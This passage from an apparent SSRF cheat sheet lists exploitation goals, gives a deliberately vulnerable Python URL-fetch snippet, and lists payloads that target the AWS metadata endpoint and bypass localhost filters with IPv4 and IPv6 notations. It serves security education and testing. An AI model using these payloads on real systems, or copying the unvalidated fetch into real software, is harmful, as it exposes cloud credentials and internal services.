Common exploitation paths:

• Accessing Cloud metadata
• Leaking files on the server
• Network discovery, port scanning with the SSRF
• Sending packets to specific services on the network, usually to achieve a Remote Command Execution on another server

Example: A server accepts user input to fetch a URL.

url = input("Enter URL:")
response = requests.get(url)
return response

An attacker supplies a malicious input:

<http://169.254.169.254/latest/meta-data/>

This fetches sensitive information from the AWS EC2 metadata service.

Bypassing Filters

Default Targets

By default, Server-Side Request Forgery are used to access services hosted on localhost or hidden further on the network.

• Using localhost

  <http://localhost:80>
  <http://localhost:22>
  <https://localhost:443>
  

• Using 127.0.0.1

  <http://127.0.0.1:80>
  <http://127.0.0.1:22>
  <https://127.0.0.1:443>
  

• Using 0.0.0.0

  <http://0.0.0.0:80>
  <http://0.0.0.0:22>
  <https://0.0.0.0:443>
  

Bypass Localhost with IPv6 Notation

• Using unspecified address in IPv6 [::]

  http://[::]:80/
  

• Using IPv6 loopback addres[0000::1]

  http://[0000::1]:80/
  

• Using IPv6/IPv4 Address Embedding

  http://[0:0:0:0:0:ffff:127.0.0.1]
  http://[::ffff:127.0.0.1]